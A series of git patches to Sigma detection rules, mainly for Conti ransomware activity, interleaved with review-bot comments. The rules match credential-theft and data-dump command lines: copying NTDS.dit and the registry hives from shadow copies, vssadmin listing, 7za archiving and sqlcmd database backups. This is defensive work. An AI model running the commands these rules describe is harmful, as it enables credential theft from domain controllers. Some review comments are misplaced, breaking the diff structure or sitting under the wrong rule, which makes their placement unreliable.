+ CommandLine|contains:
+ - '\\NTDS.dit'
+ - '\\SYSTEM'
+ - '\\SECURITY'
+ - 'C:\\tmp\\log'
+ condition: all of them
+falsepositives:
+ - Some rare backup scenarios
+level: medium
diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml
new file mode 100644
index 00000000..14509d5e
--- /dev/null
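Review bot: win_malware_conti_7zip.yml reuses the title `Conti Volume Shadow Listing` from win_malware_conti.yml although its own description says it detects NTDS exfiltration via 7za; titles become alert names, so give it a distinct one, e.g. `+title: Conti NTDS Exfiltration Via 7-Zip`. The same title is repeated by win_malware_conti_shadowcopy.yml on this line and win_susp_cmd_shadowcopy_access.yml on the next, which also share the id `c73124a7-3e89-44a3-bdc1-25fe4df754b1`; later patches in this series reassign the ids but leave the titles duplicated. In win_malware_conti_shadowcopy.yml, `selection_2` contains `'\\SYSTEM'`, and because Sigma string matching is case-insensitive by default this also hits `\System32\` and `\SystemRoot\` in ordinary command lines, so once `selection_1` matches the second selection adds almost no precision; anchoring on the hive path, e.g. `- '\\config\\SYSTEM'` and `- '\\config\\SECURITY'`, keeps the intent without the noise.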
+++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml
@@ -0,0 +1,19 @@
+title: Conti Volume Shadow Listing
+id: c73124a7-3e89-44a3-bdc1-25fe4df754b1
+description: Detects a command used by conti to access volume shadow backups
+author: Max Altgelt, Tobias Michalski
+date: 2021/08/09
+status: experimental
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_1:
+ CommandLine|contains:
+ - 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'
+ condition: all of them
+falsepositives:
+ - Some rare backup scenarios
+level: medium
From e8723e892aa7a518b3d2ba638e4352efef0e9b8e Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 16 Aug 2021 09:19:10 +0200
Subject: [PATCH 0385/1367] clean-up powershell_invoke_nightmare.yml
---
 rules/windows/powershell/powershell_invoke_nightmare.yml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml
index 790778af..9d7443ed 100644
--- a/rules/windows/powershell/powershell_invoke_nightmare.yml
+++ b/rules/windows/powershell/powershell_invoke_nightmare.yml
@@ -13,8 +13,7 @@ logsource:
 detection:
 selection:
 EventID: 4104
- ScriptBlockText:
- - Invoke-Nightmare
+ ScriptBlockText: Invoke-Nightmare
 condition: selection
 falsepositives:
 - Unknown
From 26d632bf052502104300098dcdbb067cc0729997 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 16 Aug 2021 09:19:46 +0200
Subject: [PATCH 0386/1367] fix condition
---
 rules/windows/process_creation/win_malware_conti.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml
index 7e3e32d4..45a57e0a 100644
--- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -14,7 +14,7 @@ detection: CommandLine|contains|all: - 'vssadmin list shadows' - 'log.txt' - condition: 1 of them + condition: selection fields: - User - CommandLine From ed424c55c81cc69e480266198c398e5c47c468c7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:20:25 +0200 Subject: [PATCH 0387/1367] fix selection --- rules/windows/process_creation/win_malware_conti_7zip.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 4023e89b..7f5cbeb0 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -10,11 +10,11 @@ logsource: category: process_creation product: windows detection: - selection_1: + selection: CommandLine|contains|all: - '7za.exe' - '\\C$\\temp\\log.zip' - condition: all of them + condition: selection falsepositives: - Unknown level: high From 5b09dff1fbd162dbc92c6e3d5a39014e8ad8d4ae Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:21:04 +0200 Subject: [PATCH 0388/1367] cleanup win_malware_conti_shadowcopy.yml --- .../windows/process_creation/win_malware_conti_shadowcopy.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index babdb8d3..105e17ae 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml 
@@ -11,8 +11,7 @@ logsource: product: windows detection: selection_1: - CommandLine|contains: - - '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + CommandLine|contains: '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' selection_2: CommandLine|contains: - '\\NTDS.dit' From fb80b35141551425c2f37f4ca7ad8f95be28b3f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:21:38 +0200 Subject: [PATCH 0389/1367] fix condition --- .../process_creation/win_susp_cmd_shadowcopy_access.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 14509d5e..5c5f1de5 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -10,10 +10,9 @@ logsource: category: process_creation product: windows detection: - selection_1: - CommandLine|contains: - - 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' - condition: all of them + selection: + CommandLine|contains: 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + condition: selection falsepositives: - Some rare backup scenarios level: medium From 78e2c0da92a1b3acde6f3a2931b872a5e12fb765 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 16 Aug 2021 09:26:45 +0200 Subject: [PATCH 0390/1367] fix: Clean up duplicated ID --- rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 105e17ae..71cfae6b 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml 
@@ -1,5 +1,5 @@ title: Conti Volume Shadow Listing -id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 +id: ff4bf8d6-751f-417c-8111-3ba1d9bbdcf6 description: Detects a command used by conti to access volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 From dc9bb22a008c39c719e42fca42dcb89c5d5a57b7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:29:22 +0200 Subject: [PATCH 0391/1367] fix duplicate id --- rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 71cfae6b..73c8c6a9 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -1,5 +1,5 @@ title: Conti Volume Shadow Listing -id: ff4bf8d6-751f-417c-8111-3ba1d9bbdcf6 +id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d description: Detects a command used by conti to access volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 From f8bedfa759fe71c0d65695e2da8732dcc42c2162 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 10:12:35 +0200 Subject: [PATCH 0392/1367] docs: added link to leak file on VT --- rules/windows/process_creation/win_malware_conti.yml | 1 + rules/windows/process_creation/win_malware_conti_7zip.yml | 1 + rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 1 + .../windows/process_creation/win_susp_cmd_shadowcopy_access.yml | 1 + 4 files changed, 4 insertions(+) diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml index 45a57e0a..c529a3ba 100644 --- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml 
@@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 7f5cbeb0..15198fae 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 73c8c6a9..3292bcba 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 5c5f1de5..319eef8e 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml 
@@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows From 40018eef7f102e85ce4788a3540b07806d70c2c1 Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 10:44:01 +0200 Subject: [PATCH 0393/1367] edit help + case where 'select=' --- tools/sigma/backends/sql.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index cd0b8647..18f8ab30 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -45,19 +45,21 @@ class SQLBackend(SingleTextQueryBackend): mapLength = "(%s %s)" options = SingleTextQueryBackend.options + ( - ("table", False, "Use this option to specify table name, default is \"eventlog\"", None), + ("table", "eventlog", "Use this option to specify table name.", None), + ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), ) def __init__(self, sigmaconfig, options): super().__init__(sigmaconfig) + if "table" in options: self.table = options["table"] else: self.table = "eventlog" - if "select" in options: + if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: self.select_fields = list() From 16269c0d6388b15f72cf5ca416496a66199a22e5 Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 10:47:05 +0200 Subject: [PATCH 0394/1367] cleaner default value handling --- tools/sigma/backends/sql.py | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index 18f8ab30..31afbb58 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py 
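Review bot: The `eventlog` default is now declared twice, once in the `table` option tuple and again in the `else: self.table = "eventlog"` branch of `__init__`, and the two can drift apart. If the option framework applies the declared defaults (I cannot confirm that from this hunk) the branch can simply become `self.table = options["table"]`; otherwise `self.table = options.get("table", "eventlog")` keeps a single source of truth. The bare `.split(',')` on `select` also keeps surrounding whitespace, so `select=a, b` selects a column named `" b"`; `self.select_fields = [f.strip() for f in options["select"].split(",") if f.strip()]` avoids that and drops empty entries from a trailing comma.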
@@ -48,7 +48,6 @@ class SQLBackend(SingleTextQueryBackend): ("table", "eventlog", "Use this option to specify table name.", None), ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), ) - def __init__(self, sigmaconfig, options): @@ -62,7 +61,7 @@ class SQLBackend(SingleTextQueryBackend): if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: - self.select_fields = list() + self.select_fields = list("*") def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] @@ -197,10 +196,7 @@ class SQLBackend(SingleTextQueryBackend): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") result = self.generateNode(parsed.parsedSearch) - select = "*" - - if self.select_fields: - select = ", ".join(self.select_fields) + select = ", ".join(self.select_fields) if parsed.parsedAgg: #Handle aggregation From 79bc89b3447e9fdb7171f61f77839d1515b4cad5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 10:57:03 +0200 Subject: [PATCH 0395/1367] rule: av hacktool events --- rules/windows/malware/av_hacktool.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/malware/av_hacktool.yml diff --git a/rules/windows/malware/av_hacktool.yml b/rules/windows/malware/av_hacktool.yml new file mode 100644 index 00000000..fe2fa7cf --- /dev/null +++ b/rules/windows/malware/av_hacktool.yml 
@@ -0,0 +1,25 @@ +title: Antivirus Hacktool Detection +id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool +date: 2021/08/16 +author: Florian Roth +references: + - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ +logsource: + product: antivirus +detection: + selection: + - Signature|startswith: + - 'HTOOL' + - 'HKTL' + - 'SecurityTool' + - 'ATK/' # Sophos + - Signature|contains: + - 'Hacktool' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: high From a70607bce7d2319e18ca079619b0844053f1f0f7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 11:08:19 +0200 Subject: [PATCH 0396/1367] add process_creation_coti_sqlcmd.yml --- .../process_creation_coti_sqlcmd.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_coti_sqlcmd.yml diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml new file mode 100644 index 00000000..becce241 --- /dev/null +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml 
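Review bot: The new rule has no `status` field and no `tags`, while every other rule added in this series sets `status: experimental` and most carry ATT&CK tags. Add `status: experimental` after `id`, and a `tags:` entry for whichever technique the hack-tool category is meant to map to — I cannot tell that from the rule alone, so the author should pick it. `Signature|contains: 'Hacktool'` is also a one-item list; writing it as a scalar matches the cleanups done in patches 0385–0389 of this same series.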
@@ -0,0 +1,31 @@ +title: Conti backup Database +id: 2f47f1fd-0901-466e-a770-3b7092834a1b +status: experimental +author: frack113 +date: 2021/08/16 +description: Detects a command used by conti to dump database +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 #the leak info not the files itself + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection + - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 +tags: + - attack.collection +logsource: + category: process_creation + product: windows +detection: + selection_tools: + CommandLine|contains|: + - 'sqlcmd ' + - 'sqlcmd.exe' + selection_svr: + CommandLine|contains|: ' -S localhost ' + selection_query: + CommandLine|contains|: + - 'sys.sysprocesses' + - 'master.dbo.sysdatabases' + - 'BACKUP DATABASE' + condition: all of them +falsepositives: + - Unknown +level: medium From a861f55e5c77b8914797435dfae9f05191685b38 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 11:15:32 +0200 Subject: [PATCH 0397/1367] fix title --- .../windows/process_creation/process_creation_coti_sqlcmd.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml index becce241..e1e426cb 100644 --- a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml @@ -1,4 +1,4 @@ -title: Conti backup Database +title: Conti Backup Database id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: experimental author: frack113 @@ -28,4 +28,4 @@ detection: condition: all of them falsepositives: - Unknown -level: medium +level: high From fda11e360833686311c41b24bb068134a01fc512 Mon Sep 17 00:00:00 2001 
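Review bot: The file name `process_creation_coti_sqlcmd.yml` misspells Conti and breaks from the `win_malware_conti_*.yml` naming used by the sibling rules in this series; rename it to `win_malware_conti_sqlcmd.yml` before anything references it. `selection_svr` pins the server to `' -S localhost '`, but sqlcmd also accepts forms such as `-S .`, `-S (local)` and `-S 127.0.0.1`, and the trailing space means a `-S localhost` at the very end of the command line does not match. Listing the local spellings under `CommandLine|contains:` without the trailing space would keep the rule tight while not hinging on one exact token.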
From: frack113 Date: Mon, 16 Aug 2021 11:22:50 +0200 Subject: [PATCH 0398/1367] fix very bad cut and paste --- .../process_creation/process_creation_coti_sqlcmd.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml index e1e426cb..2b141c5d 100644 --- a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml @@ -15,13 +15,13 @@ logsource: product: windows detection: selection_tools: - CommandLine|contains|: + CommandLine|contains: - 'sqlcmd ' - 'sqlcmd.exe' selection_svr: - CommandLine|contains|: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains|: + CommandLine|contains: - 'sys.sysprocesses' - 'master.dbo.sysdatabases' - 'BACKUP DATABASE' From 2dbf9af27d5317fc1d11a6c009d9bec5e0c01661 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 12:56:24 +0200 Subject: [PATCH 0399/1367] add definition to powershell-classic --- ...susp_athremotefxvgpudisablementcommand.yml | 1 + .../windows/builtin/win_susp_zip_compress.yml | 1 + .../powershell_alternate_powershell_hosts.yml | 20 +++++++++---------- ...powershell_delete_volume_shadow_copies.yml | 1 + .../powershell_downgrade_attack.yml | 1 + .../powershell/powershell_exe_calling_ps.yml | 1 + .../powershell/powershell_powercat.yml | 2 +- .../powershell_remote_powershell_session.yml | 1 + .../powershell_renamed_powershell.yml | 1 + .../powershell_suspicious_download.yml | 1 + ...owershell_tamper_with_windows_defender.yml | 4 +++- .../powershell/powershell_xor_commandline.yml | 1 + 12 files changed, 23 insertions(+), 12 deletions(-) diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml index 6ed6682d..e4d35a7b 100644 
--- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml @@ -37,6 +37,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection_cmd: HostApplication|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml index b4bb1bbb..5534e42b 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/builtin/win_susp_zip_compress.yml @@ -29,6 +29,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: HostApplication|contains|all: diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index dcf6fb16..cd7b3b56 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: experimental date: 2019/08/11 -modified: 2021/08/03 +modified: 2021/08/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -17,14 +17,6 @@ falsepositives: - MSP Detection Searcher - Citrix ConfigSync.ps1 level: medium -detection: - filter: - - ContextInfo: 'powershell.exe' - - Message: 'powershell.exe' - # Both fields contain key=value pairs where the key HostApplication is relevant but - # can't be referred directly as event field. - condition: selection and not filter - --- logsource: product: windows 
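Review bot: The added `definition: fields have to be extract from event` line is ungrammatical and does not say which fields or from where, so it reads as a to-do rather than a log-source definition. Something like `definition: 'HostApplication and related fields are not native event fields; they have to be extracted from the key=value pairs in the event message'` tells the pipeline author what to do — I am inferring the key=value form from the comment removed in powershell_alternate_powershell_hosts.yml in this same patch, so confirm it. The same string is copied into every rule touched by this patch; fixing the wording once before copying avoids a dozen follow-up edits.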
@@ -33,11 +25,19 @@ detection: selection: EventID: 4103 ContextInfo: '*' + filter: + ContextInfo: 'powershell.exe' + condition: selection and not filter --- logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 - ContextInfo: '*' \ No newline at end of file + HostApplication: '*' +detection: + filter: + HostApplication: 'powershell.exe' + condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index b899f3a9..456b0b2d 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -15,6 +15,7 @@ modified: 2021/08/03 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection_obj: CommandLine|contains|all: diff --git a/rules/windows/powershell/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_downgrade_attack.yml index 92e009c4..8ace36f2 100644 --- a/rules/windows/powershell/powershell_downgrade_attack.yml +++ b/rules/windows/powershell/powershell_downgrade_attack.yml @@ -14,6 +14,7 @@ date: 2017/03/22 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_exe_calling_ps.yml index 4785ccf2..95749b73 100644 --- a/rules/windows/powershell/powershell_exe_calling_ps.yml +++ b/rules/windows/powershell/powershell_exe_calling_ps.yml @@ -14,6 +14,7 @@ date: 2017/03/05 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection1: EventID: 400 
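Review bot: Both new filters, `ContextInfo: 'powershell.exe'` for EventID 4103 and `HostApplication: 'powershell.exe'` for EventID 400, are exact-value matches, but if those fields carry the full host path plus arguments (the comment removed in the previous hunk says HostApplication lives inside a key=value block) the filter never matches and the rule fires on every 4103/400 event. `ContextInfo|contains: 'powershell.exe'` and `HostApplication|contains: 'powershell.exe'` would exclude the real host; note in the rule that a `|contains` also suppresses an alternate host that merely passes powershell.exe as an argument, which is a deliberate trade-off. The `HostApplication: '*'` selection additionally depends on the field having been extracted upstream, as the new `definition` line implies.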
diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index ab4bf464..553a8059 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -19,6 +19,7 @@ level: medium logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 @@ -30,7 +31,6 @@ detection: logsource: product: windows service: powershell - detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index f2b4587a..3e345947 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -32,6 +32,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index e1b90910..97bde1b5 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -13,6 +13,7 @@ tags: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 73626bb1..1548d8cb 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml 
@@ -28,6 +28,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: downloadfile: EventID: 400 # get 400 ,403 and 600 for 1 execution diff --git a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_tamper_with_windows_defender.yml index 4e4e4dcc..3f32386d 100644 --- a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml +++ b/rules/windows/powershell/powershell_tamper_with_windows_defender.yml @@ -9,12 +9,14 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md author: frack113 date: 2021/06/07 +modified: 2021/08/16 falsepositives: - Unknown level: high logsource: product: windows - category: powershell-classic + service: powershell-classic + definition: fields have to be extract from event detection: select_EventID: EventID: 600 diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_xor_commandline.yml index 43addcfb..74905593 100644 --- a/rules/windows/powershell/powershell_xor_commandline.yml +++ b/rules/windows/powershell/powershell_xor_commandline.yml @@ -11,6 +11,7 @@ tags: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 From 911579023cb3759bf88eee33f6fe501542891cd5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 13:30:45 +0200 Subject: [PATCH 0400/1367] fix powershell_alternate_powershell_hosts.yml --- .../windows/powershell/powershell_alternate_powershell_hosts.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index cd7b3b56..22389518 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml 
+++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -37,7 +37,6 @@ detection: selection: EventID: 400 HostApplication: '*' -detection: filter: HostApplication: 'powershell.exe' condition: selection and not filter \ No newline at end of file From c1876b9ff68af739f55889f09e1cadcedf982c1b Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 13:33:43 +0200 Subject: [PATCH 0401/1367] add fields from rules to query + sqlite --- tools/sigma/backends/sql.py | 60 +++++++++++++++++++++++++++++++--- tools/sigma/backends/sqlite.py | 15 +++------ 2 files changed, 61 insertions(+), 14 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index 31afbb58..f18cac2f 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -21,7 +21,6 @@ import sigma from sigma.backends.base import SingleTextQueryBackend from sigma.parser.condition import SigmaAggregationParser, NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT from sigma.parser.exceptions import SigmaParseError - class SQLBackend(SingleTextQueryBackend): """Converts Sigma rule into SQL query""" identifier = "sql" @@ -61,7 +60,7 @@ class SQLBackend(SingleTextQueryBackend): if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: - self.select_fields = list("*") + self.select_fields = list() def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] 
